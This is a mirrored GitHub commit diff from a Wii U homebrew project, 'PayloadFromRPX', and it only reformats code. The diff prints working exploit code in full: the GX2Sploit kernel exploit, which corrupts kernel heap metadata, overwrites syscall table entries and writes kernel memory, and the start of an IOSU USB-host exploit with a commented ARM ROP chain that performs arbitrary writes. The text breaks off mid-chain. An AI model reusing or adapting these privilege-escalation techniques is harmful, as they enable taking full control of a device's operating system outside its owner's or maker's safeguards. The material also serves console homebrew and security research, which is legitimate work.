mirror of
https://github.com/wiiu-env/PayloadFromRPX.git
synced 2024-12-27 04:51:49 +01:00
format code
This commit is contained in:
parent
da8dfaafed
commit
75d940884d
@ -12,11 +12,10 @@
|
||||
#include "elf_abi.h"
|
||||
|
||||
|
||||
|
||||
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * sizeOut) {
|
||||
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut) {
|
||||
char path[256];
|
||||
int result = 0;
|
||||
char * sdRootPath = "";
|
||||
char *sdRootPath = "";
|
||||
if (!WHBMountSdCard()) {
|
||||
WHBLogPrintf("Failed to mount SD Card...");
|
||||
result = -1;
|
||||
@ -24,9 +23,9 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * s
|
||||
}
|
||||
|
||||
sdRootPath = WHBGetSdCardMountPath();
|
||||
sprintf(path, "%s/%s", sdRootPath,relativefilepath);
|
||||
sprintf(path, "%s/%s", sdRootPath, relativefilepath);
|
||||
|
||||
WHBLogPrintf("Loading file %s.",path);
|
||||
WHBLogPrintf("Loading file %s.", path);
|
||||
|
||||
*fileOut = WHBReadWholeFile(path, sizeOut);
|
||||
if (!(*fileOut)) {
|
||||
@ -35,55 +34,56 @@ int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * s
|
||||
goto exit;
|
||||
}
|
||||
|
||||
exit:
|
||||
exit:
|
||||
WHBUnmountSdCard();
|
||||
return result;
|
||||
}
|
||||
|
||||
static void InstallMain(void *data_elf);
|
||||
|
||||
uint32_t load_loader_elf_from_sd(unsigned char* baseAddress, const char* relativePath) {
|
||||
char * elf_data = NULL;
|
||||
uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath) {
|
||||
char *elf_data = NULL;
|
||||
uint32_t fileSize = 0;
|
||||
if(LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) {
|
||||
if (LoadFileToMem(relativePath, &elf_data, &fileSize) != 0) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
InstallMain(elf_data);
|
||||
|
||||
Elf32_Ehdr* ehdr = ( Elf32_Ehdr*)elf_data;
|
||||
Elf32_Ehdr *ehdr = (Elf32_Ehdr *) elf_data;
|
||||
|
||||
uint32_t res = ehdr->e_entry;
|
||||
|
||||
MEMFreeToDefaultHeap((void*)elf_data);
|
||||
MEMFreeToDefaultHeap((void *) elf_data);
|
||||
|
||||
return res;
|
||||
}
|
||||
|
||||
static unsigned int get_section(unsigned char *data, const char *name, unsigned int * size, unsigned int * addr, int fail_on_not_found) {
|
||||
static unsigned int get_section(unsigned char *data, const char *name, unsigned int *size, unsigned int *addr, int fail_on_not_found) {
|
||||
Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data;
|
||||
|
||||
if ( !data
|
||||
|| !IS_ELF (*ehdr)
|
||||
|| (ehdr->e_type != ET_EXEC)
|
||||
|| (ehdr->e_machine != EM_PPC)) {
|
||||
if (!data
|
||||
|| !IS_ELF (*ehdr)
|
||||
|| (ehdr->e_type != ET_EXEC)
|
||||
|| (ehdr->e_machine != EM_PPC)) {
|
||||
OSFatal("Invalid elf file");
|
||||
}
|
||||
|
||||
Elf32_Shdr *shdr = (Elf32_Shdr *) (data + ehdr->e_shoff);
|
||||
int i;
|
||||
for(i = 0; i < ehdr->e_shnum; i++) {
|
||||
const char *section_name = ((const char*)data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name;
|
||||
if(strcmp(section_name, name) == 0) {
|
||||
if(addr)
|
||||
for (i = 0; i < ehdr->e_shnum; i++) {
|
||||
const char *section_name = ((const char *) data) + shdr[ehdr->e_shstrndx].sh_offset + shdr[i].sh_name;
|
||||
if (strcmp(section_name, name) == 0) {
|
||||
if (addr)
|
||||
*addr = shdr[i].sh_addr;
|
||||
if(size)
|
||||
if (size)
|
||||
*size = shdr[i].sh_size;
|
||||
return shdr[i].sh_offset;
|
||||
}
|
||||
}
|
||||
|
||||
if(fail_on_not_found)
|
||||
OSFatal((char*)name);
|
||||
if (fail_on_not_found)
|
||||
OSFatal((char *) name);
|
||||
|
||||
return 0;
|
||||
}
|
||||
@ -98,11 +98,11 @@ static void InstallMain(void *data_elf) {
|
||||
unsigned int section_offset = get_section(data_elf, ".text", &main_text_len, &main_text_addr, 1);
|
||||
unsigned char *main_text = data_elf + section_offset;
|
||||
/* Copy main .text to memory */
|
||||
if(section_offset > 0) {
|
||||
if (section_offset > 0) {
|
||||
WHBLogPrintf("%08X %08X %d", main_text_addr, main_text, main_text_len);
|
||||
memcpy((void*)(main_text_addr), (void *)main_text, main_text_len);
|
||||
DCFlushRange((void*)main_text_addr, main_text_len);
|
||||
ICInvalidateRange((void*)main_text_addr, main_text_len);
|
||||
memcpy((void *) (main_text_addr), (void *) main_text, main_text_len);
|
||||
DCFlushRange((void *) main_text_addr, main_text_len);
|
||||
ICInvalidateRange((void *) main_text_addr, main_text_len);
|
||||
}
|
||||
|
||||
|
||||
@ -110,12 +110,12 @@ static void InstallMain(void *data_elf) {
|
||||
unsigned int main_rodata_addr = 0;
|
||||
unsigned int main_rodata_len = 0;
|
||||
section_offset = get_section(data_elf, ".rodata", &main_rodata_len, &main_rodata_addr, 0);
|
||||
if(section_offset > 0) {
|
||||
if (section_offset > 0) {
|
||||
unsigned char *main_rodata = data_elf + section_offset;
|
||||
/* Copy main rodata to memory */
|
||||
memcpy((void*)(main_rodata_addr), (void *)main_rodata, main_rodata_len);
|
||||
DCFlushRange((void*)main_rodata_addr, main_rodata_len);
|
||||
ICInvalidateRange((void*)main_rodata_addr, main_rodata_len);
|
||||
memcpy((void *) (main_rodata_addr), (void *) main_rodata, main_rodata_len);
|
||||
DCFlushRange((void *) main_rodata_addr, main_rodata_len);
|
||||
ICInvalidateRange((void *) main_rodata_addr, main_rodata_len);
|
||||
|
||||
}
|
||||
|
||||
@ -123,24 +123,24 @@ static void InstallMain(void *data_elf) {
|
||||
unsigned int main_data_addr = 0;
|
||||
unsigned int main_data_len = 0;
|
||||
section_offset = get_section(data_elf, ".data", &main_data_len, &main_data_addr, 0);
|
||||
if(section_offset > 0) {
|
||||
if (section_offset > 0) {
|
||||
unsigned char *main_data = data_elf + section_offset;
|
||||
/* Copy main data to memory */
|
||||
memcpy((void*)(main_data_addr), (void *)main_data, main_data_len);
|
||||
DCFlushRange((void*)main_data_addr, main_data_len);
|
||||
ICInvalidateRange((void*)main_data_addr, main_data_len);
|
||||
memcpy((void *) (main_data_addr), (void *) main_data, main_data_len);
|
||||
DCFlushRange((void *) main_data_addr, main_data_len);
|
||||
ICInvalidateRange((void *) main_data_addr, main_data_len);
|
||||
}
|
||||
|
||||
// get the .bss section
|
||||
unsigned int main_bss_addr = 0;
|
||||
unsigned int main_bss_len = 0;
|
||||
section_offset = get_section(data_elf, ".bss", &main_bss_len, &main_bss_addr, 0);
|
||||
if(section_offset > 0) {
|
||||
if (section_offset > 0) {
|
||||
unsigned char *main_bss = data_elf + section_offset;
|
||||
/* Copy main data to memory */
|
||||
memcpy((void*)(main_bss_addr), (void *)main_bss, main_bss_len);
|
||||
DCFlushRange((void*)main_bss_addr, main_bss_len);
|
||||
ICInvalidateRange((void*)main_bss_addr, main_bss_len);
|
||||
memcpy((void *) (main_bss_addr), (void *) main_bss, main_bss_len);
|
||||
DCFlushRange((void *) main_bss_addr, main_bss_len);
|
||||
ICInvalidateRange((void *) main_bss_addr, main_bss_len);
|
||||
}
|
||||
|
||||
}
|
||||
|
@ -1,5 +1,5 @@
|
||||
#ifndef ELF_LOADING_H
|
||||
#define ELF_LOADING_H
|
||||
#define ELF_LOADING_H
|
||||
|
||||
#include <stdint.h>
|
||||
|
||||
@ -7,12 +7,12 @@
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t * sizeOut);
|
||||
uint32_t load_loader_elf_from_sd(unsigned char* baseAddress, const char* relativePath);
|
||||
int32_t LoadFileToMem(const char *relativefilepath, char **fileOut, uint32_t *sizeOut);
|
||||
uint32_t load_loader_elf_from_sd(unsigned char *baseAddress, const char *relativePath);
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
#endif /* ELF_LOADING_H */
|
||||
#endif /* ELF_LOADING_H */
|
||||
|
||||
|
@ -17,21 +17,20 @@
|
||||
#include "utils/utils.h"
|
||||
|
||||
|
||||
#define JIT_ADDRESS 0x01800000
|
||||
#define JIT_ADDRESS 0x01800000
|
||||
|
||||
#define KERN_HEAP 0xFF200000
|
||||
#define KERN_HEAP_PHYS 0x1B800000
|
||||
#define KERN_HEAP 0xFF200000
|
||||
#define KERN_HEAP_PHYS 0x1B800000
|
||||
|
||||
|
||||
#define KERN_CODE_READ 0xFFF023D4
|
||||
#define KERN_CODE_WRITE 0xFFF023F4
|
||||
#define KERN_DRVPTR 0xFFEAB530
|
||||
#define KERN_ADDRESS_TBL 0xFFEAB7A0
|
||||
|
||||
#define KERN_CODE_READ 0xFFF023D4
|
||||
#define KERN_CODE_WRITE 0xFFF023F4
|
||||
#define KERN_DRVPTR 0xFFEAB530
|
||||
#define KERN_ADDRESS_TBL 0xFFEAB7A0
|
||||
|
||||
#define STARTID_OFFSET 0x08
|
||||
#define METADATA_OFFSET 0x14
|
||||
#define METADATA_SIZE 0x10
|
||||
#define STARTID_OFFSET 0x08
|
||||
#define METADATA_OFFSET 0x14
|
||||
#define METADATA_SIZE 0x10
|
||||
|
||||
#define BAT_SETUP_HOOK_ADDR 0xFFF1D624
|
||||
#define BAT_SETUP_HOOK_ENTRY 0x00880000
|
||||
@ -63,7 +62,7 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star
|
||||
uint32_t *ptr;
|
||||
|
||||
/* Search code before JIT area first */
|
||||
for (ptr = (uint32_t*)gadgets_start; ptr != (uint32_t*)JIT_ADDRESS; ptr++) {
|
||||
for (ptr = (uint32_t *) gadgets_start; ptr != (uint32_t *) JIT_ADDRESS; ptr++) {
|
||||
if (!memcmp(ptr, &code[0], length))
|
||||
return ptr;
|
||||
}
|
||||
@ -75,22 +74,22 @@ static void *find_gadget(uint32_t code[], uint32_t length, uint32_t gadgets_star
|
||||
/* Chadderz's kernel write function */
|
||||
void __attribute__((noinline)) kern_write(const void *addr, uint32_t value) {
|
||||
asm volatile (
|
||||
"li 3,1\n"
|
||||
"li 4,0\n"
|
||||
"mr 5,%1\n"
|
||||
"li 6,0\n"
|
||||
"li 7,0\n"
|
||||
"lis 8,1\n"
|
||||
"mr 9,%0\n"
|
||||
"mr %1,1\n"
|
||||
"li 0,0x3500\n"
|
||||
"sc\n"
|
||||
"nop\n"
|
||||
"mr 1,%1\n"
|
||||
:
|
||||
: "r"(addr), "r"(value)
|
||||
: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
|
||||
"11", "12"
|
||||
"li 3,1\n"
|
||||
"li 4,0\n"
|
||||
"mr 5,%1\n"
|
||||
"li 6,0\n"
|
||||
"li 7,0\n"
|
||||
"lis 8,1\n"
|
||||
"mr 9,%0\n"
|
||||
"mr %1,1\n"
|
||||
"li 0,0x3500\n"
|
||||
"sc\n"
|
||||
"nop\n"
|
||||
"mr 1,%1\n"
|
||||
:
|
||||
: "r"(addr), "r"(value)
|
||||
: "memory", "ctr", "lr", "0", "3", "4", "5", "6", "7", "8", "9", "10",
|
||||
"11", "12"
|
||||
);
|
||||
}
|
||||
|
||||
@ -101,14 +100,14 @@ int exploitThread(int argc, char **argv) {
|
||||
OSDynLoad_Acquire("gx2.rpl", &gx2_handle);
|
||||
|
||||
void (*pGX2SetSemaphore)(uint64_t *sem, int action);
|
||||
OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void**)&pGX2SetSemaphore);
|
||||
uint32_t set_semaphore = ((uint32_t)pGX2SetSemaphore) + 0x2C;
|
||||
OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", (void **) &pGX2SetSemaphore);
|
||||
uint32_t set_semaphore = ((uint32_t) pGX2SetSemaphore) + 0x2C;
|
||||
|
||||
uint32_t gx2_init_attributes[9];
|
||||
uint8_t *gx2CommandBuffer = (uint8_t*)memalign(0x40, 0x400000);
|
||||
uint8_t *gx2CommandBuffer = (uint8_t *) memalign(0x40, 0x400000);
|
||||
|
||||
gx2_init_attributes[0] = 1;
|
||||
gx2_init_attributes[1] = (uint32_t)gx2CommandBuffer;
|
||||
gx2_init_attributes[1] = (uint32_t) gx2CommandBuffer;
|
||||
gx2_init_attributes[2] = 2;
|
||||
gx2_init_attributes[3] = 0x400000;
|
||||
gx2_init_attributes[4] = 7;
|
||||
@ -119,20 +118,20 @@ int exploitThread(int argc, char **argv) {
|
||||
GX2Init(gx2_init_attributes); //don't actually know if this is necessary? so temp? (from loadiine or hbl idk)
|
||||
|
||||
/* Allocate space for DRVHAX */
|
||||
uint32_t *drvhax = (uint32_t*) OSAllocFromSystem(0x4c, 4);
|
||||
uint32_t *drvhax = (uint32_t *) OSAllocFromSystem(0x4c, 4);
|
||||
|
||||
/* Set the kernel heap metadata entry */
|
||||
uint32_t *metadata = (uint32_t*) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
|
||||
metadata[0] = (uint32_t)drvhax;
|
||||
metadata[1] = (uint32_t)-0x4c;
|
||||
metadata[2] = (uint32_t)-1;
|
||||
metadata[3] = (uint32_t)-1;
|
||||
uint32_t *metadata = (uint32_t *) (KERN_HEAP + METADATA_OFFSET + (0x02000000 * METADATA_SIZE));
|
||||
metadata[0] = (uint32_t) drvhax;
|
||||
metadata[1] = (uint32_t) -0x4c;
|
||||
metadata[2] = (uint32_t) -1;
|
||||
metadata[3] = (uint32_t) -1;
|
||||
|
||||
/* Find stuff */
|
||||
uint32_t gx2data[] = {0xfc2a0000};
|
||||
uint32_t gx2data_addr = (uint32_t) find_gadget(gx2data, 0x04, 0x10000000);
|
||||
uint32_t doflush[] = {0xba810008, 0x8001003c, 0x7c0803a6, 0x38210038, 0x4e800020, 0x9421ffe0, 0xbf61000c, 0x7c0802a6, 0x7c7e1b78, 0x7c9f2378, 0x90010024};
|
||||
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t,uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14;
|
||||
void (*do_flush)(uint32_t arg0, uint32_t arg1) = (void (*)(uint32_t, uint32_t)) find_gadget(doflush, 0x2C, 0x01000000) + 0x14;
|
||||
|
||||
/* Modify a next ptr on the heap */
|
||||
uint32_t kpaddr = KERN_HEAP_PHYS + STARTID_OFFSET;
|
||||
@ -148,44 +147,46 @@ int exploitThread(int argc, char **argv) {
|
||||
/* Use DRVHAX to install the read and write syscalls */
|
||||
uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
|
||||
|
||||
DCFlushRange(syscalls, 0x04*2);
|
||||
DCFlushRange(syscalls, 0x04 * 2);
|
||||
|
||||
/* Modify its save area to point to the kernel syscall table */
|
||||
drvhax[0x44/4] = KERN_SYSCALL_TBL_1 + (0x34 * 4);
|
||||
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_1 + (0x34 * 4);
|
||||
CopyToSaveArea(drvname, 6, syscalls, 8);
|
||||
drvhax[0x44/4] = KERN_SYSCALL_TBL_2 + (0x34 * 4);
|
||||
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_2 + (0x34 * 4);
|
||||
CopyToSaveArea(drvname, 6, syscalls, 8);
|
||||
drvhax[0x44/4] = KERN_SYSCALL_TBL_3 + (0x34 * 4);
|
||||
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_3 + (0x34 * 4);
|
||||
CopyToSaveArea(drvname, 6, syscalls, 8);
|
||||
drvhax[0x44/4] = KERN_SYSCALL_TBL_4 + (0x34 * 4);
|
||||
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_4 + (0x34 * 4);
|
||||
CopyToSaveArea(drvname, 6, syscalls, 8);
|
||||
drvhax[0x44/4] = KERN_SYSCALL_TBL_5 + (0x34 * 4);
|
||||
drvhax[0x44 / 4] = KERN_SYSCALL_TBL_5 + (0x34 * 4);
|
||||
CopyToSaveArea(drvname, 6, syscalls, 8);
|
||||
|
||||
/* Clean up the heap and driver list so we can exit */
|
||||
kern_write((void*)(KERN_HEAP + STARTID_OFFSET), 0);
|
||||
kern_write((void*)KERN_DRVPTR, drvhax[0x48/4]);
|
||||
kern_write((void *) (KERN_HEAP + STARTID_OFFSET), 0);
|
||||
kern_write((void *) KERN_DRVPTR, drvhax[0x48 / 4]);
|
||||
|
||||
// Install CopyData syscall
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_1 + (0x25 * 4)), (uint32_t)0x1800000);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x25 * 4)), (uint32_t)0x1800000);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_3 + (0x25 * 4)), (uint32_t)0x1800000);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_4 + (0x25 * 4)), (uint32_t)0x1800000);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_5 + (0x25 * 4)), (uint32_t)0x1800000);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x25 * 4)), (uint32_t) 0x1800000);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x25 * 4)), (uint32_t) 0x1800000);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x25 * 4)), (uint32_t) 0x1800000);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x25 * 4)), (uint32_t) 0x1800000);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x25 * 4)), (uint32_t) 0x1800000);
|
||||
|
||||
/* clean shutdown */
|
||||
GX2Shutdown();
|
||||
free(gx2CommandBuffer);
|
||||
return 0;
|
||||
}
|
||||
|
||||
void KernelWriteU32(uint32_t addr, uint32_t value);
|
||||
|
||||
extern "C" void SC_KernelCopyData(uint32_t dst, uint32_t src, uint32_t len);
|
||||
|
||||
void KernelWrite(uint32_t addr, const void *data, uint32_t length) {
|
||||
// This is a hacky workaround, but currently it only works this way. ("data" is always on the stack, so maybe a problem with mapping values from the JIT area?)
|
||||
// further testing required.
|
||||
for(int32_t i = 0; i<length; i +=4) {
|
||||
KernelWriteU32(addr + i, *(uint32_t*)(data +i));
|
||||
for (int32_t i = 0; i < length; i += 4) {
|
||||
KernelWriteU32(addr + i, *(uint32_t *) (data + i));
|
||||
}
|
||||
}
|
||||
|
||||
@ -194,12 +195,12 @@ void KernelWriteU32(uint32_t addr, uint32_t value) {
|
||||
DCFlushRange(&value, 4);
|
||||
|
||||
uint32_t dst = (uint32_t) OSEffectiveToPhysical(addr);
|
||||
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t)&value);
|
||||
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value);
|
||||
|
||||
SC_KernelCopyData(dst, src, 4);
|
||||
|
||||
DCFlushRange((void *)addr, 4);
|
||||
ICInvalidateRange((void *)addr, 4);
|
||||
DCFlushRange((void *) addr, 4);
|
||||
ICInvalidateRange((void *) addr, 4);
|
||||
}
|
||||
|
||||
|
||||
@ -208,7 +209,7 @@ void KernelWriteU32FixedAddr(uint32_t addr, uint32_t value) {
|
||||
DCFlushRange(&value, 4);
|
||||
|
||||
uint32_t dst = (uint32_t) addr;
|
||||
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t)&value);
|
||||
uint32_t src = (uint32_t) OSEffectiveToPhysical((uint32_t) &value);
|
||||
|
||||
SC_KernelCopyData(dst, src, 4);
|
||||
}
|
||||
@ -239,29 +240,29 @@ extern "C" void SC_0x36_SETBATS(void);
|
||||
int DoKernelExploit(void) {
|
||||
WHBLogPrintf("Running GX2Sploit");
|
||||
/* Make a thread to modify the semaphore */
|
||||
OSThread *thread = (OSThread*)memalign(8, 0x1000);
|
||||
uint8_t *stack = (uint8_t*)memalign(0x40, 0x2000);
|
||||
OSThread *thread = (OSThread *) memalign(8, 0x1000);
|
||||
uint8_t *stack = (uint8_t *) memalign(0x40, 0x2000);
|
||||
|
||||
OSSwitchSecCodeGenMode(0);
|
||||
memcpy((void*)0x1800000, (void*)&SCKernelCopyData, 0x100);
|
||||
memcpy((void *) 0x1800000, (void *) &SCKernelCopyData, 0x100);
|
||||
|
||||
unsigned int setIBAT0Addr = 0x1800200;
|
||||
unsigned int * curAddr = (uint32_t*) setIBAT0Addr;
|
||||
unsigned int *curAddr = (uint32_t *) setIBAT0Addr;
|
||||
|
||||
curAddr[0] = 0x7C0006AC;
|
||||
curAddr[1] = 0x4C00012C;
|
||||
curAddr[2] = 0x7C7083A6;
|
||||
curAddr[3] = 0x7C9183A6;
|
||||
curAddr[4] = 0x7C0006AC;
|
||||
curAddr[5] = 0x4C00012C;
|
||||
curAddr[6] = 0x4E800020;
|
||||
curAddr[0] = 0x7C0006AC;
|
||||
curAddr[1] = 0x4C00012C;
|
||||
curAddr[2] = 0x7C7083A6;
|
||||
curAddr[3] = 0x7C9183A6;
|
||||
curAddr[4] = 0x7C0006AC;
|
||||
curAddr[5] = 0x4C00012C;
|
||||
curAddr[6] = 0x4E800020;
|
||||
|
||||
DCFlushRange((void*)0x1800000, 0x1000);
|
||||
ICInvalidateRange((void*)0x1800000, 0x1000);
|
||||
DCFlushRange((void *) 0x1800000, 0x1000);
|
||||
ICInvalidateRange((void *) 0x1800000, 0x1000);
|
||||
|
||||
OSSwitchSecCodeGenMode(1);
|
||||
|
||||
if (OSCreateThread(thread, (OSThreadEntryPointFn)exploitThread, 0, NULL, stack + 0x2000, 0x2000, 0, 0x1) == 0) {
|
||||
if (OSCreateThread(thread, (OSThreadEntryPointFn) exploitThread, 0, NULL, stack + 0x2000, 0x2000, 0, 0x1) == 0) {
|
||||
OSFatal("Failed to create thread");
|
||||
}
|
||||
|
||||
@ -271,10 +272,10 @@ int DoKernelExploit(void) {
|
||||
free(stack);
|
||||
|
||||
unsigned char backupBuffer[0x40];
|
||||
uint32_t targetBuffer[0x40/4];
|
||||
uint32_t targetBuffer[0x40 / 4];
|
||||
|
||||
uint32_t targetAddress = 0x017FF000;
|
||||
KernelWrite((uint32_t) backupBuffer, (void*) 0x017FF000, 0x40);
|
||||
KernelWrite((uint32_t) backupBuffer, (void *) 0x017FF000, 0x40);
|
||||
|
||||
targetBuffer[0] = 0x7c7082a6; // mfspr r3, 528
|
||||
targetBuffer[1] = 0x60630003; // ori r3, r3, 0x03
|
||||
@ -284,26 +285,26 @@ int DoKernelExploit(void) {
|
||||
targetBuffer[5] = 0x7c7283a6; // mtspr 530, r3
|
||||
targetBuffer[6] = 0x7c0006ac; // eieio
|
||||
targetBuffer[7] = 0x4c00012c; // isync
|
||||
targetBuffer[8] = 0x3c600000 | (((uint32_t)SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h
|
||||
targetBuffer[9] = 0x60630000 | (((uint32_t)SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l
|
||||
targetBuffer[8] = 0x3c600000 | (((uint32_t) SCSetupIBAT4DBAT5) >> 16); // lis r3, setup_syscall@h
|
||||
targetBuffer[9] = 0x60630000 | (((uint32_t) SCSetupIBAT4DBAT5) & 0xFFFF); // ori r3, r3, setup_syscall@l
|
||||
targetBuffer[10] = 0x7c6903a6; // mtctr r3
|
||||
targetBuffer[11] = 0x4e800420; // bctr
|
||||
DCFlushRange(targetBuffer, sizeof(targetBuffer));
|
||||
|
||||
KernelWrite((uint32_t) targetAddress, (void*) targetBuffer, 0x40);
|
||||
KernelWrite((uint32_t) targetAddress, (void *) targetBuffer, 0x40);
|
||||
/* set our setup syscall to an unused position */
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_1 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_2 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_3 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_4 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void*)(KERN_SYSCALL_TBL_5 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_1 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_2 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_3 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_4 + (0x36 * 4)), targetAddress);
|
||||
kern_write((void *) (KERN_SYSCALL_TBL_5 + (0x36 * 4)), targetAddress);
|
||||
|
||||
/* run our kernel code :) */
|
||||
SC_0x36_SETBATS();
|
||||
|
||||
/* repair data */
|
||||
KernelWrite(targetAddress, backupBuffer, sizeof(backupBuffer));
|
||||
DCFlushRange((void*)targetAddress, sizeof(backupBuffer));
|
||||
DCFlushRange((void *) targetAddress, sizeof(backupBuffer));
|
||||
WHBLogPrintf("GX2Sploit done");
|
||||
return 1;
|
||||
}
|
||||
|
@ -20,11 +20,12 @@ extern const uint8_t launch_image_tga[];
|
||||
extern const uint32_t launch_image_tga_size;
|
||||
|
||||
static void uhs_exploit_init(int uhs_handle);
|
||||
|
||||
static int uhs_write32(int uhs_handle, int arm_addr, int val);
|
||||
|
||||
//!------Variables used in exploit------
|
||||
static int *pretend_root_hub = (int*)0xF5003ABC;
|
||||
static int *ayylmao = (int*)0xF4500000;
|
||||
static int *pretend_root_hub = (int *) 0xF5003ABC;
|
||||
static int *ayylmao = (int *) 0xF4500000;
|
||||
//!-------------------------------------
|
||||
|
||||
typedef struct __attribute__((packed)) {
|
||||
@ -38,280 +39,280 @@ typedef struct __attribute__((packed)) {
|
||||
|
||||
/* ROP CHAIN STARTS HERE (0x1015BD78) */
|
||||
static const int final_chain[] = {
|
||||
0x101236f3, // 0x00 POP {R1-R7,PC}
|
||||
0x0, // 0x04 arg
|
||||
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
|
||||
0x68, // 0x0C stacksize
|
||||
0x10101638, // 0x10
|
||||
0x0, // 0x14
|
||||
0x0, // 0x18
|
||||
0x0, // 0x1C
|
||||
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
|
||||
0x0, // 0x24
|
||||
0x0, // 0x28
|
||||
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x30
|
||||
0x0, // 0x34
|
||||
IOS_CREATETHREAD, // 0x38
|
||||
0x1, // 0x3C
|
||||
0x2, // 0x40
|
||||
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE92D4010, // 0x4C value: PUSH {R4,LR}
|
||||
0x0, // 0x50
|
||||
0x10123a8b, // 0x54 POP {R3,R4,PC}
|
||||
0x1, // 0x58 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x5C
|
||||
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x64
|
||||
0x0, // 0x68
|
||||
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
|
||||
0x0, // 0x70
|
||||
0x0, // 0x74
|
||||
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE1A04000, // 0x80 value: MOV R4, R0
|
||||
0x0, // 0x84
|
||||
0x10123a8b, // 0x88 POP {R3,R4,PC}
|
||||
0x1, // 0x8C R3 must be 1 for the arbitrary write
|
||||
0x0, // 0x90
|
||||
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0x98
|
||||
0x0, // 0x9C
|
||||
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0xA4
|
||||
0x0, // 0xA8
|
||||
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
|
||||
0x0, // 0xB8
|
||||
0x10123a8b, // 0xBC POP {R3,R4,PC}
|
||||
0x1, // 0xC0 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0xC4
|
||||
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
|
||||
0x0, // 0xCC
|
||||
0x0, // 0xD0
|
||||
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
|
||||
0x0, // 0xD8
|
||||
0x0, // 0xDC
|
||||
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
|
||||
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
|
||||
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
|
||||
0x0, // 0xEC
|
||||
0x10123a8b, // 0xF0 POP {R3,R4,PC}
|
||||
0x1, // 0xF4 R3 must be 1 for the arbitrary write
|
||||
0x0, // 0xF8
|
||||
